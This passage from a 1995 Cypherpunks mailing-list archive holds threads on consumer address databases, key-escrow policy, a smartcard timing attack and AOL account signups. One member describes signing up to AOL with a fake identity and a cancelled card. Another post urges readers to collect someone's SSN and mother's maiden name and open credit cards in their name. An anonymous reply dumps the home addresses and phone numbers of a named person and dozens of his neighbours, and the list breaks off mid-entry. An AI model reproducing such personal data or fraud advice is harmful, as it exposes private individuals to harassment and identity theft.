In-Reply-To: <Pine.ULT.3.91.951214111209.5962K@Networking.Stanford.EDU>
Message-ID: <Pine.SUN.3.91.951214144159.12822D-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

So far, no one has come up with anything stronger than specula-
tion about my database question.  Some "anonymous" told me how
easy it was to buy *phone numbers* on CD-ROMs.  Great, but I
didn't give the guy my phone number.

On Thu, 14 Dec 1995, Rich Graves wrote:

> One of the easiest ways to get quick address changes is to subscribe to
> the US Postal Service's mail forwarding lists. They're advertised in 
> direct marketing magazines.

Fine, but I haven't put in any changes of address with the PO.

> Local and long distance phone companies probably sell telephone
> forwarding lists too. 

Yeah, maybe, but my original question was, "does anyone KNOW how 
the trick was done?                                     ^^^^


 S a n d y

P.S.  I'm not looking for movie makers, but for movie
      investors.  Jeez

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 15 Dec 1995 08:44:27 +0800
To: Jon Lasser <jlasser@rwd.goucher.edu>
Subject: Re: e-mail forwarding, for-pay remailers
In-Reply-To: <Pine.SUN.3.91.951214171110.16699A-100000@rwd.goucher.edu>
Message-ID: <Pine.ULT.3.91.951214145617.8139B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 14 Dec 1995, Jon Lasser wrote:

> On Thu, 14 Dec 1995, Rich Graves wrote:
> 
> > > I suspect Sameer would be happy to open an account paid in advance in
> > > small unmarked bills.  AOL probably wouldn't.
> > 
> > AOL will, however, accept a bogus name, address, and credit card number
> > (as long as the checksum is correct) for the initial ten free hours plus
> > however long it takes for the first bill to bounce. 
> 
> Nope.  Not anymore.  Due to excessive fraud, they now check the credit 
> card information when you first provide it.

They didn't check it very thoroughly last week. I think they just do some
kind of checksum or maybe an assigned-numbers list lookup; it's too fast
to be anything else. 

I signed up using an unsolicited credit card that was canceled before it
was ever activated. If any paper trail remains (I'd be curious to know
whether there is any, but please don't dig too deep), it should lead to a
nonexistent entity living at my work address (a general mail drop that 
is used by 50 different people). 

Of course I fully intend to terminate the AOL account, or less likely
correct the billing information, before the ten free hours runs out. If
they ever care to investigate, they'll find an email message from me to
myself explaining what happened. 

My AOL account names and the credit card number I used are on the Web.

- -rich
 owner-win95netbugs@lists.stanford.edu
 ftp://ftp.stanford.edu/pub/mailing-lists/win95netbugs/
 gopher://quixote.stanford.edu/1m/win95netbugs
 http://www-leland.stanford.edu/~llurch/win95netbugs/faq.html

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMNCrpI3DXUbM57SdAQHMcAQAxtvY0WDHDxzXibsVDDs/sQXpZ4kGBICe
hangYsce7hu/Zlp2A37rb0pyi2klCTjZ/QK3dOdNMEnrp2aTXpPmVrSqCVZ96oWr
0Vh40VJD2gNiWZVHzRHvRp9x8mx2VMQL7+qkGQXQgyvX7O8XuneqLGQZveqVF0kt
8KcZJU/0CzI=
=zls6
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 15 Dec 1995 08:52:49 +0800
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: ADDRESS DATABASE?
In-Reply-To: <Pine.SUN.3.91.951214144159.12822D-100000@crl.crl.com>
Message-ID: <Pine.ULT.3.91.951214150935.8139D-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 14 Dec 1995, Sandy Sandfort wrote:

> > Local and long distance phone companies probably sell telephone
> > forwarding lists too. 
> 
> Yeah, maybe, but my original question was, "does anyone KNOW how 
> the trick was done?                                     ^^^^

If you give us your current and previous name, address, phone number,
credit card numbers, social security number, and a list of people you
communicate with, then we might be able to give you a more specific
answer. 

Otherwise, and probably even so, no. There's too many different ways to
invade your privacy for a third party to determine which particular
method was used. 

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 16 Dec 1995 15:49:51 +0800
To: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Subject: Re: NIST GAK meeting writeup, LONG part 3 of 3
Message-ID: <m0tQMvq-00090LC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:22 PM 12/13/95 -0600, you wrote:
>>  The term "voluntary" implies (!) that people don't have to do
>>  something, right?  If that's really the case, then the escrow agent
>>  should have no obligation to do what is called "voluntary."
>
>Voluntary GAK means the system is voluntary for the USERS, not for the ESCROW  
>AGENTS.  What is the point of certifying escrow agents if they can still  
>thumb their noses at the LEAs?

I disagree.  The issue is one that might be called "standing."  Who,
exactly, is responsible to whom in such an arrangement.  Let's suppose key
escrow (for keys for non-exported encryption devices) is REALLY VOLUNTARY.
In that case, the escrow agent's only legal  responsibility is to the owner
of the encryption device.  The government isn't a party to this voluntary
arrangement, and thus hasn't a complaint if the escrow agent refuses to comply.

I could, for example, enter into a voluntary arrangement with an escrow
agent so that he would be obligated to erase the key no more nor less than 5
days after he received it.  If he  did so 1 day after, and I needed the key,
he would have breached his obligation to ME, but not to the government.
Likewise, if he failed to erase the key, he would likewise be breaching his
agreement with me.

Unfortunately, I think you've fallen into the too-common trap of assuming
that the government can insist, unilaterally, on people's behavior even
absent laws which specifically require or prohibit specific performance.  

> The proposal is talking about throwing  
>CERTIFIED ESCROW AGENTS in jail for not complying with the authorities and  
>has absolutely nothing to do with users like you.

But you haven't established that an "escrow agent" has any duty to the
government.

>  I don't see how a system  
>where you don't have to register your keys but the escrow agents can be  
>imprisoned for not releasing a key in their possession is any less voluntary  
>to you.

It _is_ less voluntary, because it interferes with my right to escrow my key
with an organization that is willing to take the dispute to arbitrary levels
of uncooperativeness with the government.  I might insist, for example, that
the organization only store the key outside the country (beyond the reach of
US Courts) and require MY PERMISSION for them to release it to the
government.  I might also insist that they further encode the key so that
only an independent foreign organization (out of reach of US courts) could
provide the key to decrypt it.

If key escrow is REALLY REALLY REALLY "voluntary", then such arbitrary
restrictions should be do-able.


>Certainly the whole escrow thing is a sham and it couldn't possibly work if  
>it were really voluntary (witness the documents FOIA'ed from the FBI...). 

Yes but...

> We  
>all know that but there isn't anything sinister in the escrow agent  
>requirement for releasing keys under penalty of law 

Yes, there is.  I STILL refuse to accept the idea that a "key escrow agent"
(if he's keeping a VOLUNTARILY escrowed key, one not for export) must
automatically be considered to be subject to the  whim of government orders.  

>  Believe me, if we continue to have  
>voluntary GAK with no escrow agent requirements or certification when (if?)  
>Mandatory GAK comes down the escrow agent certification and penalties will  
>most definitely be part of the deal.  So I wouldn't worry about quibbling  
>over the voluntaryness just because of the proposed escrow agent  
>requirements.


Here's why you're wrong.  The government wants us to accept an arrangement
they've described as "voluntary."  (Naturally, we will refuse.)  It is
better to be able to show that we're refusing BECAUSE THEY'RE LYING about
the "voluntaryness" of the system, because that makes us appear reasonable
(which we are) and them appear unreasonable (which they are.)    Playing
along with their their assertion that the system is "voluntary" would make
it look like it is we who are being unreasonable.

So the position I'll take is this:

"You claim you are willing to accept that the system be 'voluntary.'  Okay,
the only thing I'll tolerate is one which has the maximum number of
'voluntary' aspects.  Anything less and you're lying." 

I'd insist, for example, on the unfettered ability to turn off the key
escrow "feature" on the telephone (with a switch on the side, labelled "Good
encryption vs. Big Brother's listening".   I'd insist on its ability to talk
to other telephones which have to corresponsing key escrow.

Etc, etc, etc.

If they resist, we can then say, "Oh, you must have been LYING about this
system being voluntary!  SO what else are you lying about?!?  I think you're
being unreasonable, so I have no intention of complying with ANY of your
requests, however reasonable they may appear to be on the surface, because I
cannot trust you!"

And _THAT_ would obviously be a reasonable position.  The key, however, is
that  we must expose the lying, and to do that we must use whatever
inconsistencies we can.  This is  not "quibbling":  It is establishing the
credibility (or lack of it) of THE ENEMY.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ljo@ausys.se (Johansson Lars)
Date: Thu, 14 Dec 1995 23:38:59 +0800
To: ses@tipper.oit.unc.edu
Subject: Re: Timing Cryptanalysis Attack
Message-ID: <95Dec14.153934gmt+0100.53765@void.ausys.se>
MIME-Version: 1.0
Content-Type: text/plain




Armadillo Remailer (remailer@armadillo.com) wrote:

>Simon Spero <ses@tipper.oit.unc.edu> writes:
>
>>My gut & scribble-on-the-back-of-a-napkin feeling about this class of
>>attack is that it could be a problem for smartcards (almost certainly)
>
>Is it a problem to create smartcards that do their calculations in
>fixed time? I'd guess it should be easier than on multi-purpose
>hardware.
>
>Does the attack work for existing smartcards?

At first glance, smart cards would seem to be the most critical target
to Kocher's timing attack since they usually operate in on-line
environments.

However, all RSA smart cards I'm aware of stores the result of the
RSA computation (be it decryption, signing or authentication)
internally and it can only be read using a Get_Response command.

Of course this may not be satisfying since the terminal could get a
(noisy) measure of the time by repeatingly use this command to
see when the result is available.

Most smart cards does nevertheless require that the user must first
specify a PIN code before the RSA algorithms are operationable.
This implies that even if the card gets stolen can't it be attacked
with Kocher's method.

/Lars Johansson
ljo@ausys.se





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 15 Dec 1995 09:26:08 +0800
To: llurch@networking.stanford.edu (Rich Graves)
Subject: Re: e-mail forwarding, for-pay remailers
In-Reply-To: <Pine.ULT.3.91.951214104824.5962B-100000@Networking.Stanford.EDU>
Message-ID: <199512150030.QAA24868@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain



> I suspect Sameer would be happy to open an account paid in advance in
> small unmarked bills.  AOL probably wouldn't.

	I do this all the time..

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Pettitt <jpp@software.net>
Date: Fri, 15 Dec 1995 09:30:15 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: e-mail forwarding, for-pay remailers
Message-ID: <199512150033.QAA19950@software.net>
MIME-Version: 1.0
Content-Type: text/plain



Rich Graves wrote:

[ about AOL ]
>
>They didn't check it very thoroughly last week. I think they just do some
>kind of checksum or maybe an assigned-numbers list lookup; it's too fast
>to be anything else. 


It takes 6 seconds to to pre approve a card for $1 and do an AVS (Address
Verification).  If you don't have a dedicated line to your accepting bank it
takes ~25 secods with the dial up.

Well within the time it take AOL to validate an account.


John Pettitt, jpp@software.net
VP Engineering, CyberSource Corporation, 415 473 3065

Favorite quote: "Security is mostly a superstition. It does not 
exist in nature, nor do the children of man as a whole experience
it. Avoiding danger is no safer in the long run than outright
exposure. Life is either a daring adventure, or nothing." -  Helen Keller





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp (ecarp@netcom.com)" <ecarp@netcom.com>
Date: Fri, 15 Dec 1995 07:43:22 +0800
To: Martin Janzen <janzen@idacom.hp.com>
Subject: Re: Jim Quinn interview of James Norman
Message-ID: <199512142348.RAA28682@khijol>
MIME-Version: 1.0
Content-Type: text/plain


> Date:          Wed, 13 Dec 1995 09:49:56 -0800
> From:          Martin Janzen <janzen@idacom.hp.com>
> To:            ecarp@netcom.com
> Subject:       Re: Jim Quinn interview of James Norman

> 
> This is the third time you've cross-posted this long and completely
> irrelevant message to Cypherpunks.  Please stop it!

No, sorry, I only ACCIDENTALLY cross-posted it *ONCE*.  Any other
posts you are seeing are NOT MY DOING.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: turner@TeleCheck.com
Date: Fri, 15 Dec 1995 08:19:32 +0800
To: John Pettitt <jpp@software.net>
Subject: Re: ADDRESS DATABASE?
In-Reply-To: <199512142032.MAA17978@software.net>
Message-ID: <9512142259.AA21606@mercury.telecheck.com>
MIME-Version: 1.0
Content-Type: text/plain



jpp@software.net said:
> I'm doing it now - software.net serves distinct ads to Mac, Windows, 
> Text and Unix based browsers.  
 
I checked.  Its nice, with a nice selection of products.  However, this
misses the point I didn't make in the first place -- should a company 
or a group of individuals be allowed to have access to information 
about you?  If so, where do you draw the line? How much is too much?

Another thought also occurred to me.  The thread that wouldn't die,
something about tracking people with metal detectors, currency, metalic
thread in currencies, etc... If you write a check at a TeleCheck merchant, 
(in most cases) we know it immediately.  Now take Visa, MasterCard,
Discover, American Express, they know when you use their cards, location
and all.  Now, you want to be totally anonymous and live on cash only, right?
If you cash a check at a TeleCheck merchant, guess what... 

What if through information brokering, or by government intervention it
became profitable to sell this information on a real-time basis?  What
ramifications would this have?  "I see here Mr. so-and-so that you bought
some fertilizer.  We also have reciepts for gasoline, oil, and beef jerkey. 
would you mind comming with us?... we seem to be below our quota this 
month for bombing suspects..."

This really doesn't bother me all that much.  Its the possibility of fraud
and misuse that is possible.  The more information I have about *YOU*, the
easier it is for me to impersonate YOU.  Or at least cancel all of your
credit cards, and cause HaViC as the 3l33t3 D00dz say.

Ok, how about a real life demonstration...

Just this week, I called my bank to cancel an ATM card and order a VISA
cash card.  What did they need?  Social security number, my name, address,
account, and the maiden name of my mother.  Often they want less, but this
would be a good example.

Find someone you know.  And try to obtain the above information.  Just
for grins, try it.  Just remember to be creative, and remember, the 
government is you _friend_.  You may be suprised.  Better yet, start
applying for credit cards in this person's name.  It does count against them.

> On the name database side the PO runs somthing called National Change 
> of Address which tracks who moved where and allows direct marketing 
> companys to clean their lists.  Almost everybody sells address change 
> data (utilities, the PO, credit companys) - I'm getting tons of 
> "welcome to the neighbourhood" mail since I moved.

I got the same thing, complete with gift certificates to be used at 
the neighbourhood grocery stores.  I'm not complaining, although it is
annoying to go the the mail box to find the current issue of MSJ or DDJ
crumpled because the mail carier had to stuff advertisements into the
overflowing mailbox.  

The funny thing is that when I lived with my parents I was named 
"Resident." 

> John Pettitt jpp@software.net "why not, and who said so?" 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Fri, 15 Dec 1995 07:09:50 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: e-mail forwarding, for-pay remailers
In-Reply-To: <Pine.ULT.3.91.951214104824.5962B-100000@Networking.Stanford.EDU>
Message-ID: <Pine.SUN.3.91.951214171110.16699A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 14 Dec 1995, Rich Graves wrote:

> > I suspect Sameer would be happy to open an account paid in advance in
> > small unmarked bills.  AOL probably wouldn't.
> 
> AOL will, however, accept a bogus name, address, and credit card number
> (as long as the checksum is correct) for the initial ten free hours plus
> however long it takes for the first bill to bounce. 

Nope.  Not anymore.  Due to excessive fraud, they now check the credit 
card information when you first provide it.

(This made it impossible for a client to subscribe on the day 
after Thanksgiving, because AOL couldn't get through to the credit 
verification through all the shoppers...)

For any nontrivial denomination, this leads me to believe that ecash will 
be verified when online, not offline later.

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp (ecarp@netcom.com)" <ecarp@netcom.com>
Date: Fri, 15 Dec 1995 12:56:25 +0800
To: Bill Stewart <cypherpunks@toad.com
Subject: Re: ADDRESS DATABASE?
Message-ID: <199512150028.SAA30583@khijol>
MIME-Version: 1.0
Content-Type: text/plain


> Date:          Thu, 14 Dec 1995 13:06:50 -0800
> To:            cypherpunks@toad.com
> From:          Bill Stewart <stewarts@ix.netcom.com>
> Subject:       Re: ADDRESS DATABASE? 

> At 01:32 PM 12/14/95 -0600, you wrote:
> >sandfort@crl.com said:
> >> Something of privacy interest happened to me yesterday.  I phoned a 
> >> company to ask for a copy of their catalog.  The phone clerk asked 
> >> for my last name and zip code.  After receiving that info, the clerk 
> >> asked me, "Is this your full name and address?" and then gave them 
> >> both correctly.  I was taken aback.
> >
> > Taken aback?  Its only going to get worse in the future.  As Telcos, credit
> >card companies, etc., start looking for new ways to make money I think 
> >selling information about you will increase dramatically.
> 
> I'm in the process of moving and getting new phones, and Pac Bell asked me
> if it was ok to send my Social Security Number to my long-distance carrier.
> I told them "no, but you don't have my SSN anyway" "Oh, you're right, we don't;
> can we have it" "No" "OK.  Would you be willing to give us your driver's license
> number or another form of ID?  We've just started asking for this recently." 
> "Is it required?" "No, it's optional, but I have to ask" "No, thanks"

You know why they want that, don't you?  So if you don't pay your 
bill, they can ding your credit report.  PG&E will do the same thing 
to you, and they will both do it illegally, without notifying you 
first as they are required to do by law.  So, I'd advise you to check 
your credit report regularly for signs of abuse.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Fri, 15 Dec 1995 13:50:04 +0800
To: cypherpunks@toad.com
Subject: Re: And the standard continues to lower...
Message-ID: <2.2b7.32.19951215013346.008d4434@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:17 PM 12/13/95 -0600, you wrote:
>Dr. Brian L. Crissey includes in his .sig, courtesy of cactus@hks.net
>[ much WRT YetAnotherSecureInternetCreditCardPaymentSystem(*tm) deleted ]
>> ***Dr. Brian L. Crissey, Chair CS Dpt, Linfield Col., McMinnville, OR 97128
>> (503)-434-2426 brianc@linfield.edu
>> Professionals built the Titanic, amateurs built the Ark...
>
>However, the Ark was *designed* by GOD (if you believe the story).  Can Dr.  
>Brian L. Crissey say the same thing about his payment system?

He seems to think so...  He is so assured as to the security of his system.
I am going to ask if I can post his challenge he made to me in private
e-mail here.  He needs to be taught some basics in security.  (I do not have
the proper hardware to subvert his scheme.  I do have some other ways of
subverting it, but that would be telling...  (I occasionally assist with the
web server on Teleport.  Changing his script to collect information would
not be difficult...))

I will see if he will let me forward his e-mail to the list.  (I will also
check with the webmistress on Teleport before I do...  She might get pissed
if I turned the people on the list onto Teleport's server.)

|       What is the Eye in the Food Pyramid?      | alano@teleport.com   |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer:          |
| mankind free in one-key-steganography-privacy!" | Ignore the man       |
|`finger -l alano@teleport.com` for PGP 2.6.2 key |  behind the keyboard.|
|         http://www.teleport.com/~alano/         |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Charles Graves <llurch@networking.stanford.edu>
Date: Fri, 15 Dec 1995 13:53:24 +0800
To: cypherpunks@toad.com
Subject: Another One-Time Pad Reference
Message-ID: <199512150151.RAA09562@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


http://www.atria.com/~dawson/tbtf/archive/0044.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolann@censored.org>
Date: Fri, 15 Dec 1995 09:07:05 +0800
To: cypherpunks@toad.com
Subject: Re: ADDRESS DATABASE?
Message-ID: <199512150002.RAA23168@usr3.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


>On Thu, 14 Dec 1995, Sandy Sandfort wrote:

>> Yeah, maybe, but my original question was, "does anyone KNOW how 
>> the trick was done?                                     ^^^^

Sandy,

The phone companies sold the information as soon as you moved. 
^^^ ^^^^^ ^^^^^^^^^^ ^^^^ ^^^^ ^^^^^^^^^^^ ^^ ^^^^ ^^ ^^^ ^^^^^^
It's called the Blue Book, any library has one for your
area. Welcome Wagons and the like buy them.

You can buy lists by address, sequential phone #'s, types of
services people order, etc. 

A recent real-life example is this:

I ordered caller-id on my phone in Nov. I already have had
three direct mailings for security devices. It is assumed by
being a girl, and ordering caller ID I am in fear.

--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 15 Dec 1995 02:57:26 +0800
To: cypherpunks@toad.com
Subject: Re: ADDRESS DATABASE?
Message-ID: <199512141740.SAA13977@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Sandy Sandfort 7:51 AM 12/14/95 (not completely in this order):

>Something of privacy interest happened to me yesterday.  I phoned
>a company to ask for a copy of their catalog.  The phone clerk
>asked for my last name and zip code.  After receiving that info,
>the clerk asked me, "Is this your full name and address?" and
>then gave them both correctly.  I was taken aback.

    That is the correct response.

>Does anyone know how this trick was done?

    What trick? For ~$150, you can buy a CD-ROM-set DB with every listed
phone number in the U.S. on it, faxes too; the info's rife with typos and 
has a lag of ~6-7 months, but what do you want? If you're willing to pay
more, you'll get more -- more accurate, more timely, more aggressively
correlated, more thorough info.

>I have been at my new address for only a couple of months.  Prior

    Where's your new address, under a rock? ;) 

>to that, I have been couch surfing for a year and a half.  Though

    Ironically, NFA status will get you on some very aggressive lists.

>I called an 800 number, ANI had nothing to do with it since I was
>calling from work.  It may have been from a database associated
>with a credit reporting agency, a bank or a utility company, but

    [x] all of the above

>I am not aware of any of these being available on-line for 

    They are.

>something as mundane as requesting a consumer catalog.  The clerk 
              ^^^^^^^

    Are you being serious? Ever heard of "information markets"? What,
are you a libertarian just because you don't like taxes? There are
other reasons for being one... :)

>had no idea where the info came from (or so he said). 


Detweiler   L           Detweiler   L S         Detweiler   Larry 
8525 E Hampden Ave      3704 S 2nd St           2884 Ww Ave
Denver  CO              Austin TX               Parnell IA
80231-4826              78704-7073              52325-8825
303-695-0497            512-448-1750            319-628-4461

Detweiler Lynn          Detweiler   Lynn        Detweiler Lynn Teenline
                        1724 N Alabama St       1045 W Forevergreen Rd
North Liberty IA        Silver City NM          North Liberty IA
52317                   88061-4302              52317-9717
319-626-6272            505-538-2776            319-626-8216
                          
<etc.>

      PS. Unless your postscript (in the classical sense) about getting
help making an adult film was a pickup line, maybe you could talk to one
of Detweiler's neighbors about it...

Allen Michael L
8525 E Hampden Ave
Denver, CO  80231-4826
303-750-6855

Allerheiligen Shane & Robin
8525 E Hampden Ave
Denver, CO  80231-4826
303-338-5250

Ambrosino Greg
8525 E Hampden Ave
Denver, CO  80231-4826
303-338-5723

Anderson Michael W
8525 E Hampden Ave
Denver, CO  80231-4826
303-696-1057

Armour Lyles
8525 E Hampden Ave
Denver, CO  80231-4826
303-743-0933

Auslen James
8525 E Hampden Ave
Denver, CO  80231-4826
303-671-5129

Baker Barbara
8525 E Hampden Ave
Denver, CO  80231-4826
303-751-4451

Banks Mark
8525 E Hampden Ave
Denver, CO  80231-4826
303-671-9228

Banner K
8525 E Hampden Ave
Denver, CO  80231-4826
303-750-4587

Barison Joseph
8525 E Hampden Ave
Denver, CO  80231-4826
303-743-9661

Becker Michelle
8525 E Hampden Ave
Denver, CO  80231-4826
303-745-0320

Beckler Barbara
8525 E Hampden Ave
Denver, CO  80231-4826
303-745-8793

Belloni Beecky
8525 E Hampden Ave
Denver, CO  80231-4826
303-671-5114

Bennett Tim
8525 E Hampden Ave
Denver, CO  80231-4826
303-337-2903

Berlin T A
8525 E Hampden Ave
Denver, CO  80231-4826
303-745-0541

Berthonnaud Jon
8525 E Hampden Ave
Denver, CO  80231-4826
303-751-7496

Biery Timothy
8525 E Hampden Ave
Denver, CO  80231-4826
303-755-5589

Bond H M
8525 E Hampden Ave
Denver, CO  80231-4826
303-369-5513

Bosworth Lisa
8525 E Hampden Ave
Denver, CO  80231-4826
303-743-8447

Budd Edward K
8525 E Hampden Ave
Denver, CO  80231-4826
303-752-9749

Chlopek Joanna
8525 E Hampden Ave
Denver, CO  80231-4826
303-752-4647

Coleman Warren
8525 E Hampden Ave
Denver, CO  80231-4826
303-695-4761

Cormier Keith
8525 E Hampden Ave
Denver, CO  80231-4826
303-750-1783

Cox R
8525 E Hampden Ave
Denver, CO  80231-4826
303-337-5744

Dayton C
8525 E Hampden Ave
Denver, CO  80231-4826
303-750-5281

Dietz Scott
8525 E Hampden Ave
Denver, CO  80231-4826
303-750-6657

Dillon C
8525 E Hampden Ave
Denver, CO  80231-4826
303-338-5495

Donaldson Jennifer
8525 E Hampden Ave
Denver, CO  80231-4826
303-750-7681

Dooley Patricia F
8525 E Hampden Ave
Denver, CO  80231-4826
303-750-5443

Duke Alison
8525 E Hampden Ave
Denver, CO  80231-4826
303-671-7286

Elizondo Arthuro
8525 E Hampden Ave
Denver, CO  80231-4826
303-338-0348

Erfman Jeff
8525 E Hampden Ave
Denver, CO  80231-4826
303-755-7570

Farris J
8525 E Hampden Ave
Denver, CO  80231-4826
303-696-1283

Faulkner Theresa
8525 E Hampden Ave
Denver, CO  80231-4826
303-750-6341

Fernandes Roland C
8525 E Hampden Ave
Denver, CO  80231-4826
303-750-1650

Fouse Sue
8525 E Hampden Ave
Denver, CO  80231-4826
303-750-0015

Fox J
8525 E Hampden Ave
Denver, CO  80231-4826
303-337-5960

Gaffney Walter R
8525 E Hampden Ave 1513
Denver, CO  80231
303-368-9245

Goodell Brooke
8525 E Hampden Ave
Denver, CO  80231-4826
303-755-5765

Graham Calvin
8525 E Hampden Ave
Denver, CO  80231-4826
303-750-5853

Grant Dallas
8525 E Hampden Ave
Denver, CO  80231-4826
303-671-7792

Grosskreutz Vicki
8525 E Hampden Ave
Denver, CO  80231-4826
303-745-1905

Hewett Vern
8525 E Hampden Ave
Denver, CO  80231-4826
303-751-5786

Higgins Scott
8525 E Hampden Ave
Denver, CO  80231-4826
303-696-8126

Howard W
8525 E Hampden Ave
Denver, CO  80231-4826
303-745-9591

Howe Josh
8525 E Hampden Ave
Denver, CO  80231-4826
303-337-6322

Huggins Scott
8525 E Hampden Ave
Denver, CO  80231-4826
303-745-6627

Hunt Derek
8525 E Hampden Ave
Denver, CO  80231-4826
303-755-7306

Hunter Lisa
8525 E Hampden Ave
Denver, CO  80231-4826
303-338-5505

Jackson J C
8525 E Hampden Ave
Denver, CO  80231-4826
303-750-2418

Jensen J A
8525 E Hampden Ave
Denver, CO  80231-4826
303-750-1906

Kiolbasa Mike
8525 E Hampden Ave
Denver, CO  80231-4826
303-338-9216

Klein Misty
8525 E Hampden Ave
Denver, CO  80231-4826
303-745-3986

Leiker Ron
8525 E Hampden Ave
Denver, CO  80231-4826
303-671-9558

Lenard P
8525 E Hampden Ave
Denver, CO  80231-4826
303-751-3253

Lopez Jennifer
8525 E Hampden Ave
Denver, CO  80231-4826
303-337-1765

Marinella Michelle D
8525 E Hampden Ave
Denver, CO  80231-4826
303-751-3645

Mclane William T
8525 E Hampden Ave
Denver, CO  80231-4826
303-337-6035

Mcqueen Mike
8525 E Hampden Ave
Denver, CO  80231-4826
303-750-7483

Milbrath Jeff
8525 E Hampden Ave
Denver, CO  80231-4826
303-750-7925

Moffit S L
8525 E Hampden Ave
Denver, CO  80231-4826
303-369-2964

Murchison Rob
8525 E Hampden Ave
Denver, CO  80231-4826
303-368-1260

Nash Jesse H
8525 E Hampden Ave
Denver, CO  80231-4826
303-752-1141

Nichols Keith
8525 E Hampden Ave
Denver, CO  80231-4826
303-337-0062

Palesch Mindi
8525 E Hampden Ave
Denver, CO  80231-4826
303-671-5177

Parker L
8525 E Hampden Ave
Denver, CO  80231-4826
303-750-4587

Peterson N C
8525 E Hampden Ave 720
Denver, CO  80231
303-752-4807

Plunkett Lisa A
8525 E Hampden Ave
Denver, CO  80231-4826
303-338-5986

Plybon Jonathan
8525 E Hampden Ave
Denver, CO  80231-4826
303-671-0681

Reynolds Robert
8525 E Hampden Ave
Denver, CO  80231-4826
303-337-3489

Richey Robert
8525 E Hampden Ave
Denver, CO  80231-4826
303-338-9074

Sabourin William & Tasha
8525 E Hampden Ave
Denver, CO  80231-4826
303-745-6005

Sanborn Bruce E
8525 E Hampden Ave
Denver, CO  80231-4826
303-752-1838

Schroeder Paul
8525 E Hampden Ave
Denver, CO  80231-4826
303-671-5231

Sears Marc & Denise
8525 E Hampden Ave
Denver, CO  80231-4826
303-745-2958

Shaw R
8525 E Hampden Ave
Denver, CO  80231-4826
303-696-7014

Short Maynard P
8525 E Hampden Ave
Denver, CO  80231-4826
303-671-5647

Shriner Christopher S
8525 E Hampden Ave
Denver, CO  80231-4826
303-695-0806

Sicles T A
8525 E Hampden Ave
Denver, CO  80231-4826
303-750-5744

Sinks Curt E
8525 E Hampden Ave
Denver, CO  80231-4826
303-671-8118

Smith J H
8525 E Hampden Ave
Denver, CO  80231-4826
303-338-5438

Smith Marc G
8525 E Hampden Ave
Denver, CO  80231-4826
303-750-8531

Sorrell Larry W
8525 E Hampden Ave
Denver, CO  80231-4826
303-695-4778

States Michael W
8525 E Hampden Ave
Denver, CO  80231-4826
303-750-7416

Steward E C
8525 E Hampden Ave
Denver, CO  80231-4826
303-337-3259

Sullivan K
8525 E Hampden Ave
